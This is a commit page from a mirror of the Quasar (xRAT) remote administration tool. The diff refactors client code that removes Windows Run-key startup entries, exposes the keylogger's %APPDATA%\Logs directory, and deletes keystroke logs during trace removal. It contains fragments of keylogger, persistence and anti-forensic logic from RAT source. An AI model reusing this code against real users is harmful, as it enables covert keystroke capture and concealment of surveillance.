Rooba
/
Quasar
mirror of https://github.com/quasar/Quasar.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/MaxXor/xRAT

This commit is contained in:
d3agle 2015-07-27 11:55:34 -05:00
parent 0c054e2a2c edb4e69869
commit ddfdca3cc9
2 changed files with 68 additions and 63 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

115
Client/Core/SystemCore.cs
View File

@ -14,6 +14,7 @@
using xClient.Core.Extensions; using xClient.Core.Extensions;
using xClient.Core.Helper; using xClient.Core.Helper;
using xClient.Core.Networking; using xClient.Core.Networking;
using xClient.Core.Utilities;
using xClient.Enums; using xClient.Enums;
namespace xClient.Core namespace xClient.Core
@ -404,6 +405,62 @@ public static void AddToStartup()
} }
} }
public static void RemoveFromStartup()
{
if (Settings.STARTUP)
{
if (AccountType == "Admin")
{
try
{
using (
RegistryKey key =
Registry.LocalMachine.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key != null)
{
key.DeleteValue(Settings.STARTUPKEY, false);
key.Close();
}
}
}
catch
{
// try deleting from Registry.CurrentUser
using (
RegistryKey key =
Registry.CurrentUser.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key != null)
{
key.DeleteValue(Settings.STARTUPKEY, false);
key.Close();
}
}
}
}
else
{
try
{
using (
RegistryKey key =
Registry.CurrentUser.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key != null)
{
key.DeleteValue(Settings.STARTUPKEY, false);
key.Close();
}
}
}
catch
{
}
}
}
}
public static void Install(bool addToStartup = true) public static void Install(bool addToStartup = true)
{ {
bool isKilled = false; bool isKilled = false;
@ -523,65 +580,13 @@ public static void UpdateClient(Client c, string newFile)
public static void RemoveTraces() public static void RemoveTraces()
{ {
if (Settings.STARTUP) RemoveFromStartup();
{
if (AccountType == "Admin")
{
try
{
using (
RegistryKey key =
Registry.LocalMachine.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key != null)
{
key.DeleteValue(Settings.STARTUPKEY, true);
key.Close();
}
}
}
catch
{
// try deleting from Registry.CurrentUser
using (
RegistryKey key =
Registry.CurrentUser.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key != null)
{
key.DeleteValue(Settings.STARTUPKEY, true);
key.Close();
}
}
}
}
else
{
try
{
using (
RegistryKey key =
Registry.CurrentUser.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key != null)
{
key.DeleteValue(Settings.STARTUPKEY, true);
key.Close();
}
}
}
catch
{
}
}
}
string logsDirectory = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Logs\\"; if (Directory.Exists(Keylogger.LogDirectory)) // try to delete Logs from Keylogger
if (Directory.Exists(logsDirectory)) // try to delete Logs from Keylogger
{ {
try try
{ {
Directory.Delete(logsDirectory, true); Directory.Delete(Keylogger.LogDirectory, true);
} }
catch catch
{ {

16
Client/Core/Utilities/Keylogger.cs
View File

@ -14,9 +14,6 @@ namespace xClient.Core.Utilities
/// This class provides keylogging functionality and modifies/highlights the output for /// This class provides keylogging functionality and modifies/highlights the output for
/// better user experience. /// better user experience.
/// </summary> /// </summary>
/// <remarks>
/// The log files will be written to the log directory which is located under '%APPDATA%\Logs\'.
/// </remarks>
public class Keylogger : IDisposable public class Keylogger : IDisposable
{ {
/// <summary> /// <summary>
@ -29,7 +26,11 @@ public class Keylogger : IDisposable
/// </summary> /// </summary>
public bool IsDisposed { get; private set; } public bool IsDisposed { get; private set; }
private readonly string _logDirectory; /// <summary>
/// The directory where the log files will be saved.
/// </summary>
public static string LogDirectory { get { return Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Logs\\"; } }
private readonly Timer _timerFlush; private readonly Timer _timerFlush;
private StringBuilder _logFileBuffer; private StringBuilder _logFileBuffer;
private List<Keys> _pressedKeys = new List<Keys>(); private List<Keys> _pressedKeys = new List<Keys>();
@ -46,7 +47,6 @@ public Keylogger(double flushInterval)
{ {
Instance = this; Instance = this;
_lastWindowTitle = string.Empty; _lastWindowTitle = string.Empty;
_logDirectory = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Logs\\";
_logFileBuffer = new StringBuilder(); _logFileBuffer = new StringBuilder();
Subscribe(Hook.GlobalEvents()); Subscribe(Hook.GlobalEvents());
@ -244,12 +244,12 @@ private void WriteFile()
{ {
bool writeHeader = false; bool writeHeader = false;
string fileName = _logDirectory + DateTime.Now.ToString("MM-dd-yyyy"); string fileName = LogDirectory + DateTime.Now.ToString("MM-dd-yyyy");
try try
{ {
if (!Directory.Exists(_logDirectory)) if (!Directory.Exists(LogDirectory))
Directory.CreateDirectory(_logDirectory); Directory.CreateDirectory(LogDirectory);
if (!File.Exists(fileName)) if (!File.Exists(fileName))
writeHeader = true; writeHeader = true;